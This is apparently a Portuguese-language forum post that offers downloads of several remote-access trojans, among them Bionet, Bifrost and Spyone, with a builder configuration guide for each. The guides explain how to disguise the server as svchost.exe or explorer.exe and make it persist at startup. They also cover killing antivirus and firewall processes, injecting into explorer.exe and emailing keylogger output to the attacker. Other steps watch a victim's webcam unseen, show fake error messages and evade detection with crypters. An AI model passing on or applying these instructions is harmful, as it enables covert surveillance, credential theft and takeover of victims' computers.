trojan de coneção reversa com keylogger e diversas funçoes... 

 

 

Configurando 

 

Na opção Ports 2001 (marque) pra ativar a listagem Options -> Settings Coloque uma Senha em Password ->Marque enable Keylogger on connect Marque AutoListen on Startup 

 

 

Criando o Server 

 

File -> new Server ->

Installation Escolha onde sera instalado o servidor assim que executado pela vitima windows ou system e coloque o nome ->ex:svchost.exe 

 

 

Startup 

 

-Marque AutoStart With Windows (Serve para Iniciar o server junto com o windows) 

-Key (escreva msgmsgr.exe ou ...) 

-Marque Persistent Server 

-Melt Server After Install (é opcional , serve para sumir Instalador do server assim que executado)

 

 

Identification 

 

-Group (escolha um nome ou deixe como esta) 

-Name (escolha um nome) 

 

 

Firewall Bypassing 

 

-Marque Default Browser e escreva iexplorer.exe -Marque MSN Messenger e escreva msnmsgr.exe -Marque Specified Application(s) escreva explorer.exe

 

Connection 

 

-Connect to port (deixa 2001) 

-password (coloque a senha) 

 

 

Connect to Ip

 

-Coloque sua conta no-ip , ex-> xxxx.no-ip.org 

-Receive IP From URL Coloque http://seu no-ip ex-> http://xxxx.no-ip.org 

-Encryption Key (coloque qualquer coisa 

 

 

Compress server 

 

(é opcional) se for passar themida ou ... desmarque esta opção. 

 

Save e Pronto 

 

 

Baixar Arquivo

 

 

* Clique em build new server 

 

* em conection (escolhe reverse conection ou direct conection) se escolher reverse conection , em host name (coloque seu no-ip) 

 

*porta deixe como esta (porta 80) 

 

*timeout deixe como esta 10sec 

 

* Em Intalation 

deixe marcado as duas opçoes [Install e FWB]

 

*install folder é o diretorio onde sera instalado (fica a sua opção[windows folder ou system folder] 

 

*deixe marcado Melt se quiser que o instalador do servidor desapareça quando for executado. 

 

* Em Packer Deixe como esta [no packer / own packer] para puder proteger com themida 

 

* Build para salvar seu server 

 

* Pronto seu server esta criado.

 

 

Baixar Arquivo

* Disponivel somente no idioma ingles (mas facil de usar)

* Acesso remoto total ao PC da Vitima

* Inclusive webcam da vitima sem que ela veja!

* com direito a criação do server,escolha do icone,podendo juntar com outro programa

* Com keylogger

* E mais...

 

 

Baixar Arquivo

 

* Em portugues 

 

* Contem apenas dois arquivos ( Cliente e server ) 

 

* Acesso remoto ao PC da Vitima 

 

* Inclusive webcam da vitima sem que ela veja! 

 

* E mais... 

 

* Conecta facil 

 

* é so enviar o server que ja vem pronto a vitima!

 

 

 

Baixar Arquivo

 

*Abra o Cliente... 

*Depois de Aberto Clique em "BUILD SERVE" 

*Marque a Opção Reverse Conection 

*Syn Port Deixe a Porta que Esta. 

*''Password" Coloque uma Senha(Para o Uso da Conexão Direta).

*Em Server Name Coloque svchost.exe ou explorer.exe ou Outro Processo que Fique Dificil a Visulização e Identificação do Mesmo... 

*Marque a Opção Reside in "SYSTEM". 

*Marque a Opção "INJECT IN EXPLORER.EXE''

*Em Notifications ->IP DNS ->Coloque sua Conta NO-IP 

*E em Startup Desmarque a Opção ActiveX. 

*Agora Vá Para AV-FW Kill, Marque a Opção kill AV - FW on start. 

*Vá para Misc, e Marque "Clean Restore Point (XP)" Também Enable Keylogger. 

*Abaixo de Enable Keylogger Clique em Configure, e em "SEND IT AT" Digite o Seu e-mail , e Abaixo Digite o smtp do seu Provedor de e-mail. 

*E Também Marque a Opção"ENABLE SMART KEYLOGGER" e Clique em OK. 

*Se Você Quiser Mensagem de Erro na Hora da Execução do Server "FAKE ERROR MESSAGE" 

*Depois Vá Para Exe Icon,Escolha um Icone ,

Depois Clique Em "Save Server"

 

 

Baixar Arquivo

 

Abrindo o editor do Bionet em main

 

*general -> 

 

-coloque o nome do server em Server name 

-em serv password colque uma senha 

-marque a opção Stealth mode (modo oculto) 

-marque use random ports 

-marque melt server (é opcional) 

(Para o server sumir assim que executado) 

 

*Startup -> 

 

-em File Name é o nome do server no sistema Marque e escreva svchost.exe ou explorer.exe , -> lembrando que o nome do processo fica opcional de cada um! 

-em Key Name é o nome da chave do server ,deixe como esta , mas é opicional tb. 

 

*Stealth -> 

 

-Marque Enable This Feature! ,se quiser que o server de uma mensagem de erro ao ser executado (é opcional de cada um , cada um tem sua propria engenharia. ) 

se marcar esta opção em ->

_error massage body coloque o nome do erro e 

_error message title coloque a sua mensagem e tem o botão test se quiser ver como ficou a mensagem. 

-em AntiVirus / Firewall work arounds 

marque a opção dont run para desabilitar o firewall 

 

* ICQ Notification -> 

 

-desmarque tudo 

 

*Static IP Notification ->

 

-Marque enable this feature é a opção de coneção reversa. 

-Ip Adress colque sua conta no-ip 

-Port deixa como esta porta 600 

 

*Keylogger -> 

 

-marque a opção enable offline logging 

-marque enable leylog emailer 

-em to coloque seu e-mail 

-em server coloque mx4.mail.yahoo.com ,se for yahoo,se for outro veja o servidor 

-em port deixa smtp se for yahoo , se for outra veja o servidor 

 

*Advanced -> 

 

-BioNet Engine desmarque a opção enable compression para poder proteger com themida. 

se não for passar themida deixa marcada a opção 

-Emailer colque seu e-mail 

-deixe marcado allow plugins para total funcionamento -no run lins tem mais de 30 processos , 

insira o maximo de processos que conheça manualmente cancela inicialização do firewall zonealarme e processos dele como vsmon.exe cancela o processos ccleaner cancela processos do anti-trojan cancela o processo do kaspersky avp.exe cancela processos do norton NAVAPW32.EXE NAVW32.EXE entre outros ,

-podendo adicionar mais processos manualmente. 

 

 

Baixar Arquivo

 

*Settings

 

-As Portas a serem usadas : 80 200 123.

-Em Password escolha uma senha.

-E o resto deixe tudo marcado e de um Ok.

 

*CRIANDO SERVER

 

*Clique em "Builder"

 

*Aba Connection

-Em Dynamic DNS/IP coloque o Host da sua conta na No-IP e clique em Add.

-Password coloque uma senha.

-E em Port 81.

 

*Aba Installation

 

-Em Filename When Installed coloque win32.exe

-Logo abaixo em Directory To Install é opcional coloque windows ou system32.eu dou preferencia a system32

-E marque a opção System Directory.

 

Deixe marcado Autostart At Reboot.

 

-Logo depois deixe marcado tambem: Include Extension Pack, Offline Keylogger, Exclude Shift And Ctrl.

-Em baixo em Injection escreva svchost.exe ou explorer.exe ou ...

-Agora em Mutex Name coloque: bif123

-Registry Key: win32

-Assigned Name: Nome para sua vítima.

 

*Aba Stealth

 

-Apenas deixe marcado as seguintes opções: Cautious Mode, Set Attribute Hidden, Set Older File Date, Melt Server é opcional (assim que executado some o instalador.)

-O resto deixe desmarcado.

 

*Aba Miscellaneous

 

-Não meixa em nada, apenas clique em Build, e o Server será criado na msm pasta do bifrost. 

 

 

Baixar Arquivo

 

* Trojan de Coneção Reversa 

 

* Muito Facil de Usar.

 

 

 * Em Portugues 

 

 

 * Acesso Remoto ao PC da Vitima 

 

 

 * Inclusive webcam! 

 

 

 * E muito Mais... 

 

 

* Conecta Facil

 

 

 

--> Criando Server

 

 *Va Em New Server

 

 

 *Em Seu DNS -> Coloca Sua Conta No-Ip

 

 

 *Porta 888 -> Deixa esta Mesmo 888

 

 

 *Em Nome -> Coloca Um Nome Qualquer

 

 

 *Em Entrar Em -> Desmarca a Opção Bloco De Notas e a Opção Comprimir e Marque Apenas a Opção Explorer.

 

 

 *Em Inicialização -> Desmarque a Opção Startup ActiveX e Deixe Marcado as Demais Opções (obs-> a Opção =Melt é Opcional, Serve para Excluir o Instalador Apos Instalado no Sistema. )

 

 

 *Va Em Criar Server PRONTO!!!

 

 

Seu Server Do Spyone Está Criado. Proteja com um Crypter e Pronto.

 

 

Senha para descompactar --> twi-fabiogrunge%

 

 

Baixar Arquivo

 

 

* Trojan de coneção reversa com KeyLogger

 

* Muito facil de usar. 

 

* Acesso remoto ao PC da Vitima 

 

* Inclusive webcam da vitima sem que ela veja! *

 

E muito mais... 

 

 

 

Criando Server 

 

 

 

*Va Em Build Server

 

->Connection 

 

*Em Seu DNS/IP Adress -> Coloca Sua Conta No-Ip 

 

*Em Syn Port Deixe a Porta Porta 995 

 

->Startup

 

*Start Key ->Coloque um processo do windows ,assim fica mais dificil de identificar EX->svchost.exe , explorer.exe , Issas.exe , System ...

 

*Registry Run Local Machine -> Deixe Marcado 

 

*Startup ActiveXKey é Opcional , Mas eu Deixo marcado.

 

->Instalation

 

*FileName When Instaled ->Coloque um Nome Ex->svchost.exe ou ...

 

*Assingned name ID -> Coloque um Nome Qualquer

 

*Escolha o Local da Instalação (Windows ou System32)Eu dou preferencia a pasta System32 Por Contem Mais Componentes e Fica mais Dificil de Achar

 

*Marque Persistent Server

 

*A Opção Melt é Opcional (Faz Sumir o Server Apos Executado)

 

->Marque a Opção KeyLogger

 

->Desmarque a Opção AutoPack Server (Para Proteger com themida ou outro...)

 

->Build Para Criar o Server

 

 

 

 

Baixar Arquivo